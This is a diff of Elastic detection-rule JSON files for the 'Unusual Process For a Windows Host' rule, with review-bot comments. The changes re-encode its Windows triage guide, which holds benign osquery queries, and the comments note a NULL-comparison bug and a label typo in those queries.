@@ -15,7 +15,7 @@ "v3_rare_process_by_host_windows" ], "name": "Unusual Process For a Windows Host", - "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - 
!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove 
and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. 
If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], 
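Review bot: The "Osquery - Retrieve Services Running on User Accounts" query on the new side of this hunk will always return an empty result set, because `user_account == null` evaluates to NULL in SQLite, so `NOT (false OR false OR false OR NULL)` is NULL for every non-system service and the WHERE clause drops the row. That silently turns a triage step into a false "nothing found" during an investigation; the comparison should read `OR user_account IS NULL`. The third query's label in the same hunk also has a typo, `Retrieve Service Unisgned Executables` for `Unsigned`. These rule files appear to be generated release artifacts, so both fixes belong in the upstream rule source rather than a hand edit here; the same query text is repeated in the _106 version of this rule, whose hunk runs past the end of this view.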
@@ -34,7 +34,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_106.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_106.json
index 1bdb3de316b..36897a50980 100644
--- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_106.json
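Review bot: The `"MITRE ATT\u0026CK"` → `"MITRE ATT&CK"` rewrite here is a pure re-serialization — both spellings decode to the identical string — so this hunk, the matching `framework` hunks in the 6d448b96 _107, 6d8685a1 _1/_2/_3 and 6e1a2cc4 _1–_4 files below, and the `\u003e` → `>` edits inside the `note` strings carry no rule-content change. The pattern looks like the export tooling's JSON encoder stopped HTML-escaping `&`, `<` and `>` rather than a deliberate edit, although the cause is not visible in this diff. If that is the case, pinning the encoder's escaping setting in the exporter would stop a later release from flipping these lines back and would leave future diffs showing only genuine rule updates. It would also help to state the escaping change in the PR description so anyone diffing rule content downstream does not read it as a detection change.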
@@ -15,7 +15,7 @@ "v3_rare_process_by_host_windows" ], "name": "Unusual Process For a Windows Host", - "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - 
!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove 
and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. 
If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], 
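Review bot: The second osquery block on the new side of this `note` string, `... FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR ... OR user_account == null)`, returns no rows under SQLite's three-valued logic: `user_account == null` evaluates to NULL, so for any service not matching the LIKE patterns the OR chain is NULL, `NOT NULL` is NULL, and the WHERE clause rejects the row, while matching rows are rejected by design — the comparison should read `OR user_account IS NULL)`. The same query text is carried unchanged in the 6d448b96 _107 copy of this rule in the next `note` hunk, and presumably in the other Windows ML investigation guides that embed it. Two smaller documentation points on the same line: the third osquery label reads `Retrieve Service Unisgned Executables with Virustotal Link` (should be `Unsigned`), and the `### Related Rules` list names this rule itself (`Unusual Process For a Windows Host - 6d448b96-…`), which is noise for an analyst reading the alert.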
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_107.json b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_107.json
index d9442d13117..a0e102a1e54 100644
--- a/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/6d448b96-c922-4adb-b51c-b767f1ea5b76_107.json
@@ -15,7 +15,7 @@ "v3_rare_process_by_host_windows" ], "name": "Unusual Process For a Windows Host", - "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - 
!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove 
and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. 
If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection 